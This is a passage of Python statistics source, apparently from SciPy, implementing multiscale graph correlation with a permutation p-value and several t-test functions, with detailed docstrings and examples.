if x.size != y.size:
raise ValueError("All inputs to `weightedtau` must be of the same size, "
"found x-size %s and y-size %s" % (x.size, y.size))
if not x.size:
return WeightedTauResult(np.nan, np.nan) # Return NaN if arrays are empty
# If there are NaNs we apply _toint64()
if np.isnan(np.sum(x)):
x = _toint64(x)
if np.isnan(np.sum(x)):
y = _toint64(y)
# Reduce to ranks unsupported types
if x.dtype != y.dtype:
if x.dtype != np.int64:
x = _toint64(x)
if y.dtype != np.int64:
y = _toint64(y)
else:
if x.dtype not in (np.int32, np.int64, np.float32, np.float64):
x = _toint64(x)
y = _toint64(y)
if rank is True:
return WeightedTauResult((
_weightedrankedtau(x, y, None, weigher, additive) +
_weightedrankedtau(y, x, None, weigher, additive)
) / 2, np.nan)
if rank is False:
rank = np.arange(x.size, dtype=np.intp)
elif rank is not None:
rank = np.asarray(rank).ravel()
if rank.size != x.size:
raise ValueError("All inputs to `weightedtau` must be of the same size, "
"found x-size %s and rank-size %s" % (x.size, rank.size))
return WeightedTauResult(_weightedrankedtau(x, y, rank, weigher, additive), np.nan)
# FROM MGCPY: https://github.com/neurodata/mgcpy
class _ParallelP(object):
"""
Helper function to calculate parallel p-value.
"""
def __init__(self, x, y, compute_distance, random_states):
self.x = x
self.y = y
self.compute_distance = compute_distance
self.random_states = random_states
def __call__(self, index):
permx = self.random_states[index].permutation(self.x)
permy = self.random_states[index].permutation(self.y)
# calculate permuted stats, store in null distribution
perm_stat = _mgc_stat(permx, permy, self.compute_distance)[0]
return perm_stat
def _perm_test(x, y, stat, compute_distance, reps=1000, workers=-1,
random_state=None):
r"""
Helper function that calculates the p-value. See below for uses.
Parameters
----------
x, y : ndarray
`x` and `y` have shapes `(n, p)` and `(n, q)`.
stat : float
The sample test statistic.
compute_distance : callable
A function that computes the distance or similarity among the samples
within each data matrix. Set to `None` if `x` and `y` are already
distance.
reps : int, optional
The number of replications used to estimate the null when using the
permutation test. The default is 1000 replications.
workers : int or map-like callable, optional
If `workers` is an int the population is subdivided into `workers`
sections and evaluated in parallel (uses
`multiprocessing.Pool <multiprocessing>`). Supply `-1` to use all cores
available to the Process. Alternatively supply a map-like callable,
such as `multiprocessing.Pool.map` for evaluating the population in
parallel. This evaluation is carried out as `workers(func, iterable)`.
Requires that `func` be pickleable.
random_state : int or np.random.RandomState instance, optional
If already a RandomState instance, use it.
If seed is an int, return a new RandomState instance seeded with seed.
If None, use np.random.RandomState. Default is None.
Returns
-------
pvalue : float
The sample test p-value.
null_dist : list
The approximated null distribution.
"""
# generate seeds for each rep (change to new parallel random number
# capabilities in numpy >= 1.17+)
random_state = check_random_state(random_state)
random_states = [np.random.RandomState(random_state.randint(1 << 32,
size=4, dtype=np.uint32)) for _ in range(reps)]
# parallelizes with specified workers over number of reps and set seeds
mapwrapper = MapWrapper(workers)
parallelp = _ParallelP(x=x, y=y, compute_distance=compute_distance,
random_states=random_states)
null_dist = np.array(list(mapwrapper(parallelp, range(reps))))
# calculate p-value and significant permutation map through list
pvalue = (null_dist >= stat).sum() / reps
# correct for a p-value of 0. This is because, with bootstrapping
# permutations, a p-value of 0 is incorrect
if pvalue == 0:
pvalue = 1 / reps
return pvalue, null_dist
def _euclidean_dist(x):
return cdist(x, x)
MGCResult = namedtuple('MGCResult', ('stat', 'pvalue', 'mgc_dict'))
def multiscale_graphcorr(x, y, compute_distance=_euclidean_dist, reps=1000,
workers=1, is_twosamp=False, random_state=None):
r"""
Computes the Multiscale Graph Correlation (MGC) test statistic.
Specifically, for each point, MGC finds the :math:`k`-nearest neighbors for
one property (e.g. cloud density), and the :math:`l`-nearest neighbors for
the other property (e.g. grass wetness) [1]_. This pair :math:`(k, l)` is
called the "scale". A priori, however, it is not know which scales will be
most informative. So, MGC computes all distance pairs, and then efficiently
computes the distance correlations for all scales. The local correlations
illustrate which scales are relatively informative about the relationship.
The key, therefore, to successfully discover and decipher relationships
between disparate data modalities is to adaptively determine which scales
are the most informative, and the geometric implication for the most
informative scales. Doing so not only provides an estimate of whether the
modalities are related, but also provides insight into how the
determination was made. This is especially important in high-dimensional
data, where simple visualizations do not reveal relationships to the
unaided human eye. Characterizations of this implementation in particular
have been derived from and benchmarked within in [2]_.
Parameters
----------
x, y : ndarray
If ``x`` and ``y`` have shapes ``(n, p)`` and ``(n, q)`` where `n` is
the number of samples and `p` and `q` are the number of dimensions,
then the MGC independence test will be run. Alternatively, ``x`` and
``y`` can have shapes ``(n, n)`` if they are distance or similarity
matrices, and ``compute_distance`` must be sent to ``None``. If ``x``
and ``y`` have shapes ``(n, p)`` and ``(m, p)``, an unpaired
two-sample MGC test will be run.
compute_distance : callable, optional
A function that computes the distance or similarity among the samples
within each data matrix. Set to ``None`` if ``x`` and ``y`` are
already distance matrices. The default uses the euclidean norm metric.
If you are calling a custom function, either create the distance
matrix before-hand or create a function of the form
``compute_distance(x)`` where `x` is the data matrix for which
pairwise distances are calculated.
reps : int, optional
The number of replications used to estimate the null when using the
permutation test. The default is ``1000``.
workers : int or map-like callable, optional
If ``workers`` is an int the population is subdivided into ``workers``
sections and evaluated in parallel (uses ``multiprocessing.Pool
<multiprocessing>``). Supply ``-1`` to use all cores available to the
Process. Alternatively supply a map-like callable, such as
``multiprocessing.Pool.map`` for evaluating the p-value in parallel.
This evaluation is carried out as ``workers(func, iterable)``.
Requires that `func` be pickleable. The default is ``1``.
is_twosamp : bool, optional
If `True`, a two sample test will be run. If ``x`` and ``y`` have
shapes ``(n, p)`` and ``(m, p)``, this optional will be overriden and
set to ``True``. Set to ``True`` if ``x`` and ``y`` both have shapes
``(n, p)`` and a two sample test is desired. The default is ``False``.
random_state : int or np.random.RandomState instance, optional
If already a RandomState instance, use it.
If seed is an int, return a new RandomState instance seeded with seed.
If None, use np.random.RandomState. Default is None.
Returns
-------
stat : float
The sample MGC test statistic within `[-1, 1]`.
pvalue : float
The p-value obtained via permutation.
mgc_dict : dict
Contains additional useful additional returns containing the following
keys:
- mgc_map : ndarray
A 2D representation of the latent geometry of the relationship.
of the relationship.
- opt_scale : (int, int)
The estimated optimal scale as a `(x, y)` pair.
- null_dist : list
The null distribution derived from the permuted matrices
See Also
--------
pearsonr : Pearson correlation coefficient and p-value for testing
non-correlation.
kendalltau : Calculates Kendall's tau.
spearmanr : Calculates a Spearman rank-order correlation coefficient.
Notes
-----
A description of the process of MGC and applications on neuroscience data
can be found in [1]_. It is performed using the following steps:
#. Two distance matrices :math:`D^X` and :math:`D^Y` are computed and
modified to be mean zero columnwise. This results in two
:math:`n \times n` distance matrices :math:`A` and :math:`B` (the
centering and unbiased modification) [3]_.
#. For all values :math:`k` and :math:`l` from :math:`1, ..., n`,
* The :math:`k`-nearest neighbor and :math:`l`-nearest neighbor graphs
are calculated for each property. Here, :math:`G_k (i, j)` indicates
the :math:`k`-smallest values of the :math:`i`-th row of :math:`A`
and :math:`H_l (i, j)` indicates the :math:`l` smallested values of
the :math:`i`-th row of :math:`B`
* Let :math:`\circ` denotes the entry-wise matrix product, then local
correlations are summed and normalized using the following statistic:
.. math::
c^{kl} = \frac{\sum_{ij} A G_k B H_l}
{\sqrt{\sum_{ij} A^2 G_k \times \sum_{ij} B^2 H_l}}
#. The MGC test statistic is the smoothed optimal local correlation of
:math:`\{ c^{kl} \}`. Denote the smoothing operation as :math:`R(\cdot)`
(which essentially set all isolated large correlations) as 0 and
connected large correlations the same as before, see [3]_.) MGC is,
.. math::
MGC_n (x, y) = \max_{(k, l)} R \left(c^{kl} \left( x_n, y_n \right)
\right)
The test statistic returns a value between :math:`(-1, 1)` since it is
normalized.
The p-value returned is calculated using a permutation test. This process
is completed by first randomly permuting :math:`y` to estimate the null
distribution and then calculating the probability of observing a test
statistic, under the null, at least as extreme as the observed test
statistic.
MGC requires at least 5 samples to run with reliable results. It can also
handle high-dimensional data sets.
In addition, by manipulating the input data matrices, the two-sample
testing problem can be reduced to the independence testing problem [4]_.
Given sample data :math:`U` and :math:`V` of sizes :math:`p \times n`
:math:`p \times m`, data matrix :math:`X` and :math:`Y` can be created as
follows:
.. math::
X = [U | V] \in \mathcal{R}^{p \times (n + m)}
Y = [0_{1 \times n} | 1_{1 \times m}] \in \mathcal{R}^{(n + m)}
Then, the MGC statistic can be calculated as normal. This methodology can
be extended to similar tests such as distance correlation [4]_.
.. versionadded:: 1.4.0
References
----------
.. [1] Vogelstein, J. T., Bridgeford, E. W., Wang, Q., Priebe, C. E.,
Maggioni, M., & Shen, C. (2019). Discovering and deciphering
relationships across disparate data modalities. ELife.
.. [2] Panda, S., Palaniappan, S., Xiong, J., Swaminathan, A.,
Ramachandran, S., Bridgeford, E. W., ... Vogelstein, J. T. (2019).
mgcpy: A Comprehensive High Dimensional Independence Testing Python
Package. ArXiv:1907.02088 [Cs, Stat].
.. [3] Shen, C., Priebe, C.E., & Vogelstein, J. T. (2019). From distance
correlation to multiscale graph correlation. Journal of the American
Statistical Association.
.. [4] Shen, C. & Vogelstein, J. T. (2018). The Exact Equivalence of
Distance and Kernel Methods for Hypothesis Testing. ArXiv:1806.05514
[Cs, Stat].
Examples
--------
>>> from scipy.stats import multiscale_graphcorr
>>> x = np.arange(100)
>>> y = x
>>> stat, pvalue, _ = multiscale_graphcorr(x, y, workers=-1)
>>> '%.1f, %.3f' % (stat, pvalue)
'1.0, 0.001'
Alternatively,
>>> x = np.arange(100)
>>> y = x
>>> mgc = multiscale_graphcorr(x, y)
>>> '%.1f, %.3f' % (mgc.stat, mgc.pvalue)
'1.0, 0.001'
To run an unpaired two-sample test,
>>> x = np.arange(100)
>>> y = np.arange(79)
>>> mgc = multiscale_graphcorr(x, y, random_state=1)
>>> '%.3f, %.2f' % (mgc.stat, mgc.pvalue)
'0.033, 0.02'
or, if shape of the inputs are the same,
>>> x = np.arange(100)
>>> y = x
>>> mgc = multiscale_graphcorr(x, y, is_twosamp=True)
>>> '%.3f, %.1f' % (mgc.stat, mgc.pvalue)
'-0.008, 1.0'
"""
if not isinstance(x, np.ndarray) or not isinstance(y, np.ndarray):
raise ValueError("x and y must be ndarrays")
# convert arrays of type (n,) to (n, 1)
if x.ndim == 1:
x = x[:, np.newaxis]
elif x.ndim != 2:
raise ValueError("Expected a 2-D array `x`, found shape "
"{}".format(x.shape))
if y.ndim == 1:
y = y[:, np.newaxis]
elif y.ndim != 2:
raise ValueError("Expected a 2-D array `y`, found shape "
"{}".format(y.shape))
nx, px = x.shape
ny, py = y.shape
# check for NaNs
_contains_nan(x, nan_policy='raise')
_contains_nan(y, nan_policy='raise')
# check for positive or negative infinity and raise error
if np.sum(np.isinf(x)) > 0 or np.sum(np.isinf(y)) > 0:
raise ValueError("Inputs contain infinities")
if nx != ny:
if px == py:
# reshape x and y for two sample testing
is_twosamp = True
else:
raise ValueError("Shape mismatch, x and y must have shape [n, p] "
"and [n, q] or have shape [n, p] and [m, p].")
if nx < 5 or ny < 5:
raise ValueError("MGC requires at least 5 samples to give reasonable "
"results.")
# convert x and y to float
x = x.astype(np.float64)
y = y.astype(np.float64)
# check if compute_distance_matrix if a callable()
if not callable(compute_distance) and compute_distance is not None:
raise ValueError("Compute_distance must be a function.")
# check if number of reps exists, integer, or > 0 (if under 1000 raises
# warning)
if not isinstance(reps, int) or reps < 0:
raise ValueError("Number of reps must be an integer greater than 0.")
elif reps < 1000:
msg = ("The number of replications is low (under 1000), and p-value "
"calculations may be unreliable. Use the p-value result, with "
"caution!")
warnings.warn(msg, RuntimeWarning)
if is_twosamp:
x, y = _two_sample_transform(x, y)
# calculate MGC stat
stat, stat_dict = _mgc_stat(x, y, compute_distance)
stat_mgc_map = stat_dict["stat_mgc_map"]
opt_scale = stat_dict["opt_scale"]
# calculate permutation MGC p-value
pvalue, null_dist = _perm_test(x, y, stat, compute_distance, reps=reps,
workers=workers, random_state=random_state)
# save all stats (other than stat/p-value) in dictionary
mgc_dict = {"mgc_map": stat_mgc_map,
"opt_scale": opt_scale,
"null_dist": null_dist}
return MGCResult(stat, pvalue, mgc_dict)
def _mgc_stat(x, y, compute_distance):
r"""
Helper function that calculates the MGC stat. See above for use.
Parameters
----------
x, y : ndarray
`x` and `y` have shapes `(n, p)` and `(n, q)` or `(n, n)` and `(n, n)`
if distance matrices.
compute_distance : callable
A function that computes the distance or similarity among the samples
within each data matrix. Set to `None` if `x` and `y` are already
distance.
Returns
-------
stat : float
The sample MGC test statistic within `[-1, 1]`.
stat_dict : dict
Contains additional useful additional returns containing the following
keys:
- stat_mgc_map : ndarray
MGC-map of the statistics.
- opt_scale : (float, float)
The estimated optimal scale as a `(x, y)` pair.
"""
# set distx and disty to x and y when compute_distance = None
distx = x
disty = y
if compute_distance is not None:
# compute distance matrices for x and y
distx = compute_distance(x)
disty = compute_distance(y)
# calculate MGC map and optimal scale
stat_mgc_map = _local_correlations(distx, disty, global_corr='mgc')
n, m = stat_mgc_map.shape
if m == 1 or n == 1:
# the global scale at is the statistic calculated at maximial nearest
# neighbors. There is not enough local scale to search over, so
# default to global scale
stat = stat_mgc_map[m - 1][n - 1]
opt_scale = m * n
else:
samp_size = len(distx) - 1
# threshold to find connected region of significant local correlations
sig_connect = _threshold_mgc_map(stat_mgc_map, samp_size)
# maximum within the significant region
stat, opt_scale = _smooth_mgc_map(sig_connect, stat_mgc_map)
stat_dict = {"stat_mgc_map": stat_mgc_map,
"opt_scale": opt_scale}
return stat, stat_dict
def _threshold_mgc_map(stat_mgc_map, samp_size):
r"""
Finds a connected region of significance in the MGC-map by thresholding.
Parameters
----------
stat_mgc_map : ndarray
All local correlations within `[-1,1]`.
samp_size : int
The sample size of original data.
Returns
-------
sig_connect : ndarray
A binary matrix with 1's indicating the significant region.
"""
m, n = stat_mgc_map.shape
# 0.02 is simply an empirical threshold, this can be set to 0.01 or 0.05
# with varying levels of performance. Threshold is based on a beta
# approximation.
per_sig = 1 - (0.02 / samp_size) # Percentile to consider as significant
threshold = samp_size * (samp_size - 3)/4 - 1/2 # Beta approximation
threshold = distributions.beta.ppf(per_sig, threshold, threshold) * 2 - 1
# the global scale at is the statistic calculated at maximial nearest
# neighbors. Threshold is the maximium on the global and local scales
threshold = max(threshold, stat_mgc_map[m - 1][n - 1])
# find the largest connected component of significant correlations
sig_connect = stat_mgc_map > threshold
if np.sum(sig_connect) > 0:
sig_connect, _ = measurements.label(sig_connect)
_, label_counts = np.unique(sig_connect, return_counts=True)
# skip the first element in label_counts, as it is count(zeros)
max_label = np.argmax(label_counts[1:]) + 1
sig_connect = sig_connect == max_label
else:
sig_connect = np.array([[False]])
return sig_connect
def _smooth_mgc_map(sig_connect, stat_mgc_map):
"""
Finds the smoothed maximal within the significant region R.
If area of R is too small it returns the last local correlation. Otherwise,
returns the maximum within significant_connected_region.
Parameters
----------
sig_connect: ndarray
A binary matrix with 1's indicating the significant region.
stat_mgc_map: ndarray
All local correlations within `[-1, 1]`.
Returns
-------
stat : float
The sample MGC statistic within `[-1, 1]`.
opt_scale: (float, float)
The estimated optimal scale as an `(x, y)` pair.
"""
m, n = stat_mgc_map.shape
# the global scale at is the statistic calculated at maximial nearest
# neighbors. By default, statistic and optimal scale are global.
stat = stat_mgc_map[m - 1][n - 1]
opt_scale = [m, n]
if np.linalg.norm(sig_connect) != 0:
# proceed only when the connected region's area is sufficiently large
# 0.02 is simply an empirical threshold, this can be set to 0.01 or 0.05
# with varying levels of performance
if np.sum(sig_connect) >= np.ceil(0.02 * max(m, n)) * min(m, n):
max_corr = max(stat_mgc_map[sig_connect])
# find all scales within significant_connected_region that maximize
# the local correlation
max_corr_index = np.where((stat_mgc_map >= max_corr) & sig_connect)
if max_corr >= stat:
stat = max_corr
k, l = max_corr_index
one_d_indices = k * n + l # 2D to 1D indexing
k = np.max(one_d_indices) // n
l = np.max(one_d_indices) % n
opt_scale = [k+1, l+1] # adding 1s to match R indexing
return stat, opt_scale
def _two_sample_transform(u, v):
"""
Helper function that concatenates x and y for two sample MGC stat. See
above for use.
Parameters
----------
u, v : ndarray
`u` and `v` have shapes `(n, p)` and `(m, p)`,
Returns
-------
x : ndarray
Concatenate `u` and `v` along the `axis = 0`. `x` thus has shape
`(2n, p)`.
y : ndarray
Label matrix for `x` where 0 refers to samples that comes from `u` and
1 refers to samples that come from `v`. `y` thus has shape `(2n, 1)`.
"""
nx = u.shape[0]
ny = v.shape[0]
x = np.concatenate([u, v], axis=0)
y = np.concatenate([np.zeros(nx), np.ones(ny)], axis=0).reshape(-1, 1)
return x, y
#####################################
# INFERENTIAL STATISTICS #
#####################################
Ttest_1sampResult = namedtuple('Ttest_1sampResult', ('statistic', 'pvalue'))
def ttest_1samp(a, popmean, axis=0, nan_policy='propagate'):
"""
Calculate the T-test for the mean of ONE group of scores.
This is a two-sided test for the null hypothesis that the expected value
(mean) of a sample of independent observations `a` is equal to the given
population mean, `popmean`.
Parameters
----------
a : array_like
Sample observation.
popmean : float or array_like
Expected value in null hypothesis. If array_like, then it must have the
same shape as `a` excluding the axis dimension.
axis : int or None, optional
Axis along which to compute test. If None, compute over the whole
array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float or array
t-statistic.
pvalue : float or array
Two-sided p-value.
Examples
--------
>>> from scipy import stats
>>> np.random.seed(7654567) # fix seed to get the same result
>>> rvs = stats.norm.rvs(loc=5, scale=10, size=(50,2))
Test if mean of random sample is equal to true mean, and different mean.
We reject the null hypothesis in the second case and don't reject it in
the first case.
>>> stats.ttest_1samp(rvs,5.0)
(array([-0.68014479, -0.04323899]), array([ 0.49961383, 0.96568674]))
>>> stats.ttest_1samp(rvs,0.0)
(array([ 2.77025808, 4.11038784]), array([ 0.00789095, 0.00014999]))
Examples using axis and non-scalar dimension for population mean.
>>> stats.ttest_1samp(rvs,[5.0,0.0])
(array([-0.68014479, 4.11038784]), array([ 4.99613833e-01, 1.49986458e-04]))
>>> stats.ttest_1samp(rvs.T,[5.0,0.0],axis=1)
(array([-0.68014479, 4.11038784]), array([ 4.99613833e-01, 1.49986458e-04]))
>>> stats.ttest_1samp(rvs,[[5.0],[0.0]])
(array([[-0.68014479, -0.04323899],
[ 2.77025808, 4.11038784]]), array([[ 4.99613833e-01, 9.65686743e-01],
[ 7.89094663e-03, 1.49986458e-04]]))
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.ttest_1samp(a, popmean, axis)
n = a.shape[axis]
df = n - 1
d = np.mean(a, axis) - popmean
v = np.var(a, axis, ddof=1)
denom = np.sqrt(v / n)
with np.errstate(divide='ignore', invalid='ignore'):
t = np.divide(d, denom)
t, prob = _ttest_finish(df, t)
return Ttest_1sampResult(t, prob)
def _ttest_finish(df, t):
"""Common code between all 3 t-test functions."""
prob = distributions.t.sf(np.abs(t), df) * 2 # use np.abs to get upper tail
if t.ndim == 0:
t = t[()]
return t, prob
def _ttest_ind_from_stats(mean1, mean2, denom, df):
d = mean1 - mean2
with np.errstate(divide='ignore', invalid='ignore'):
t = np.divide(d, denom)
t, prob = _ttest_finish(df, t)
return (t, prob)
def _unequal_var_ttest_denom(v1, n1, v2, n2):
vn1 = v1 / n1
vn2 = v2 / n2
with np.errstate(divide='ignore', invalid='ignore'):
df = (vn1 + vn2)**2 / (vn1**2 / (n1 - 1) + vn2**2 / (n2 - 1))
# If df is undefined, variances are zero (assumes n1 > 0 & n2 > 0).
# Hence it doesn't matter what df is as long as it's not NaN.
df = np.where(np.isnan(df), 1, df)
denom = np.sqrt(vn1 + vn2)
return df, denom
def _equal_var_ttest_denom(v1, n1, v2, n2):
df = n1 + n2 - 2.0
svar = ((n1 - 1) * v1 + (n2 - 1) * v2) / df
denom = np.sqrt(svar * (1.0 / n1 + 1.0 / n2))
return df, denom
Ttest_indResult = namedtuple('Ttest_indResult', ('statistic', 'pvalue'))
def ttest_ind_from_stats(mean1, std1, nobs1, mean2, std2, nobs2,
equal_var=True):
r"""
T-test for means of two independent samples from descriptive statistics.
This is a two-sided test for the null hypothesis that two independent
samples have identical average (expected) values.
Parameters
----------
mean1 : array_like
The mean(s) of sample 1.
std1 : array_like
The standard deviation(s) of sample 1.
nobs1 : array_like
The number(s) of observations of sample 1.
mean2 : array_like
The mean(s) of sample 2.
std2 : array_like
The standard deviations(s) of sample 2.
nobs2 : array_like
The number(s) of observations of sample 2.
equal_var : bool, optional
If True (default), perform a standard independent 2 sample test
that assumes equal population variances [1]_.
If False, perform Welch's t-test, which does not assume equal
population variance [2]_.
Returns
-------
statistic : float or array
The calculated t-statistics.
pvalue : float or array
The two-tailed p-value.
See Also
--------
scipy.stats.ttest_ind
Notes
-----
.. versionadded:: 0.16.0
References
----------
.. [1] https://en.wikipedia.org/wiki/T-test#Independent_two-sample_t-test
.. [2] https://en.wikipedia.org/wiki/Welch%27s_t-test
Examples
--------
Suppose we have the summary data for two samples, as follows::
Sample Sample
Size Mean Variance
Sample 1 13 15.0 87.5
Sample 2 11 12.0 39.0
Apply the t-test to this data (with the assumption that the population
variances are equal):
>>> from scipy.stats import ttest_ind_from_stats
>>> ttest_ind_from_stats(mean1=15.0, std1=np.sqrt(87.5), nobs1=13,
... mean2=12.0, std2=np.sqrt(39.0), nobs2=11)
Ttest_indResult(statistic=0.9051358093310269, pvalue=0.3751996797581487)
For comparison, here is the data from which those summary statistics
were taken. With this data, we can compute the same result using
`scipy.stats.ttest_ind`:
>>> a = np.array([1, 3, 4, 6, 11, 13, 15, 19, 22, 24, 25, 26, 26])
>>> b = np.array([2, 4, 6, 9, 11, 13, 14, 15, 18, 19, 21])
>>> from scipy.stats import ttest_ind
>>> ttest_ind(a, b)
Ttest_indResult(statistic=0.905135809331027, pvalue=0.3751996797581486)
Suppose we instead have binary data and would like to apply a t-test to
compare the proportion of 1s in two independent groups::
Number of Sample Sample
Size ones Mean Variance
Sample 1 150 30 0.2 0.16
Sample 2 200 45 0.225 0.174375
The sample mean :math:`\hat{p}` is the proportion of ones in the sample
and the variance for a binary observation is estimated by
:math:`\hat{p}(1-\hat{p})`.
>>> ttest_ind_from_stats(mean1=0.2, std1=np.sqrt(0.16), nobs1=150,
... mean2=0.225, std2=np.sqrt(0.17437), nobs2=200)
Ttest_indResult(statistic=-0.564327545549774, pvalue=0.5728947691244874)
For comparison, we could compute the t statistic and p-value using
arrays of 0s and 1s and `scipy.stat.ttest_ind`, as above.
>>> group1 = np.array([1]*30 + [0]*(150-30))
>>> group2 = np.array([1]*45 + [0]*(200-45))
>>> ttest_ind(group1, group2)
Ttest_indResult(statistic=-0.5627179589855622, pvalue=0.573989277115258)
"""
if equal_var:
df, denom = _equal_var_ttest_denom(std1**2, nobs1, std2**2, nobs2)
else:
df, denom = _unequal_var_ttest_denom(std1**2, nobs1,
std2**2, nobs2)
res = _ttest_ind_from_stats(mean1, mean2, denom, df)
return Ttest_indResult(*res)
def ttest_ind(a, b, axis=0, equal_var=True, nan_policy='propagate'):
"""
Calculate the T-test for the means of *two independent* samples of scores.
This is a two-sided test for the null hypothesis that 2 independent samples
have identical average (expected) values. This test assumes that the
populations have identical variances by default.
Parameters
----------
a, b : array_like
The arrays must have the same shape, except in the dimension
corresponding to `axis` (the first, by default).
axis : int or None, optional
Axis along which to compute test. If None, compute over the whole
arrays, `a`, and `b`.
equal_var : bool, optional
If True (default), perform a standard independent 2 sample test
that assumes equal population variances [1]_.
If False, perform Welch's t-test, which does not assume equal
population variance [2]_.
.. versionadded:: 0.11.0
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float or array
The calculated t-statistic.
pvalue : float or array
The two-tailed p-value.
Notes
-----
We can use this test, if we observe two independent samples from
the same or different population, e.g. exam scores of boys and
girls or of two ethnic groups. The test measures whether the
average (expected) value differs significantly across samples. If
we observe a large p-value, for example larger than 0.05 or 0.1,
then we cannot reject the null hypothesis of identical average scores.
If the p-value is smaller than the threshold, e.g. 1%, 5% or 10%,
then we reject the null hypothesis of equal averages.
References
----------
.. [1] https://en.wikipedia.org/wiki/T-test#Independent_two-sample_t-test
.. [2] https://en.wikipedia.org/wiki/Welch%27s_t-test
Examples
--------
>>> from scipy import stats
>>> np.random.seed(12345678)
Test with sample with identical means:
>>> rvs1 = stats.norm.rvs(loc=5,scale=10,size=500)
>>> rvs2 = stats.norm.rvs(loc=5,scale=10,size=500)
>>> stats.ttest_ind(rvs1,rvs2)
(0.26833823296239279, 0.78849443369564776)
>>> stats.ttest_ind(rvs1,rvs2, equal_var = False)
(0.26833823296239279, 0.78849452749500748)
`ttest_ind` underestimates p for unequal variances:
>>> rvs3 = stats.norm.rvs(loc=5, scale=20, size=500)
>>> stats.ttest_ind(rvs1, rvs3)
(-0.46580283298287162, 0.64145827413436174)
>>> stats.ttest_ind(rvs1, rvs3, equal_var = False)
(-0.46580283298287162, 0.64149646246569292)
When n1 != n2, the equal variance t-statistic is no longer equal to the
unequal variance t-statistic:
>>> rvs4 = stats.norm.rvs(loc=5, scale=20, size=100)
>>> stats.ttest_ind(rvs1, rvs4)
(-0.99882539442782481, 0.3182832709103896)
>>> stats.ttest_ind(rvs1, rvs4, equal_var = False)
(-0.69712570584654099, 0.48716927725402048)
T-test with different means, variance, and n:
>>> rvs5 = stats.norm.rvs(loc=8, scale=20, size=100)
>>> stats.ttest_ind(rvs1, rvs5)
(-1.4679669854490653, 0.14263895620529152)
>>> stats.ttest_ind(rvs1, rvs5, equal_var = False)
(-0.94365973617132992, 0.34744170334794122)
"""
a, b, axis = _chk2_asarray(a, b, axis)
# check both a and b
cna, npa = _contains_nan(a, nan_policy)
cnb, npb = _contains_nan(b, nan_policy)
contains_nan = cna or cnb
if npa == 'omit' or npb == 'omit':
nan_policy = 'omit'
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
b = ma.masked_invalid(b)
return mstats_basic.ttest_ind(a, b, axis, equal_var)
if a.size == 0 or b.size == 0:
return Ttest_indResult(np.nan, np.nan)
v1 = np.var(a, axis, ddof=1)
v2 = np.var(b, axis, ddof=1)
n1 = a.shape[axis]
n2 = b.shape[axis]
if equal_var:
df, denom = _equal_var_ttest_denom(v1, n1, v2, n2)
else:
df, denom = _unequal_var_ttest_denom(v1, n1, v2, n2)
res = _ttest_ind_from_stats(np.mean(a, axis), np.mean(b, axis), denom, df)
return Ttest_indResult(*res)
Ttest_relResult = namedtuple('Ttest_relResult', ('statistic', 'pvalue'))
def ttest_rel(a, b, axis=0, nan_policy='propagate'):
"""
Calculate the t-test on TWO RELATED samples of scores, a and b.
This is a two-sided test for the null hypothesis that 2 related or
repeated samples have identical average (expected) values.
Parameters
----------
a, b : array_like
The arrays must have the same shape.
axis : int or None, optional
Axis along which to compute test. If None, compute over the whole
arrays, `a`, and `b`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float or array
t-statistic.
pvalue : float or array
Two-sided p-value.
Notes
-----
Examples for use are scores of the same set of student in
different exams, or repeated sampling from the same units. The
test measures whether the average score differs significantly
across samples (e.g. exams). If we observe a large p-value, for
example greater than 0.05 or 0.1 then we cannot reject the null
hypothesis of identical average scores. If the p-value is smaller
than the threshold, e.g. 1%, 5% or 10%, then we reject the null
hypothesis of equal averages. Small p-values are associated with
large t-statistics.
References
----------
https://en.wikipedia.org/wiki/T-test#Dependent_t-test_for_paired_samples
Examples
--------
>>> from scipy import stats
>>> np.random.seed(12345678) # fix random seed to get same numbers
>>> rvs1 = stats.norm.rvs(loc=5,scale=10,size=500)
>>> rvs2 = (stats.norm.rvs(loc=5,scale=10,size=500) +
... stats.norm.rvs(scale=0.2,size=500))
>>> stats.ttest_rel(rvs1,rvs2)
(0.24101764965300962, 0.80964043445811562)
>>> rvs3 = (stats.norm.rvs(loc=8,scale=10,size=500) +
... stats.norm.rvs(scale=0.2,size=500))
>>> stats.ttest_rel(rvs1,rvs3)
(-3.9995108708727933, 7.3082402191726459e-005)
"""
a, b, axis = _chk2_asarray(a, b, axis)
cna, npa = _contains_nan(a, nan_policy)
cnb, npb = _contains_nan(b, nan_policy)
contains_nan = cna or cnb
if npa == 'omit' or npb == 'omit':
nan_policy = 'omit'
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
b = ma.masked_invalid(b)
m = ma.mask_or(ma.getmask(a), ma.getmask(b))
aa = ma.array(a, mask=m, copy=True)
bb = ma.array(b, mask=m, copy=True)
return mstats_basic.ttest_rel(aa, bb, axis)
if a.shape[axis] != b.shape[axis]:
raise ValueError('unequal length arrays')
if a.size == 0 or b.size == 0:
return np.nan, np.nan
n = a.shape[axis]
df = n - 1
d = (a - b).astype(np.float64)
v = np.var(d, axis, ddof=1)
dm = np.mean(d, axis)
denom = np.sqrt(v / n)
with np.errstate(divide='ignore', invalid='ignore'):
t = np.divide(dm, denom)
t, prob = _ttest_finish(df, t)
return Ttest_relResult(t, prob)
KstestResult = namedtuple('KstestResult', ('statistic', 'pvalue'))
def kstest(rvs, cdf, args=(), N=20, alternative='two-sided', mode='approx'):
"""
Perform the Kolmogorov-Smirnov test for goodness of fit.
This performs a test of the distribution F(x) of an observed
random variable against a given distribution G(x). Under the null
hypothesis, the two distributions are identical, F(x)=G(x). The
alternative hypothesis can be either 'two-sided' (default), 'less'
or 'greater'. The KS test is only valid for continuous distributions.
Parameters
----------
rvs : str, array_like, or callable
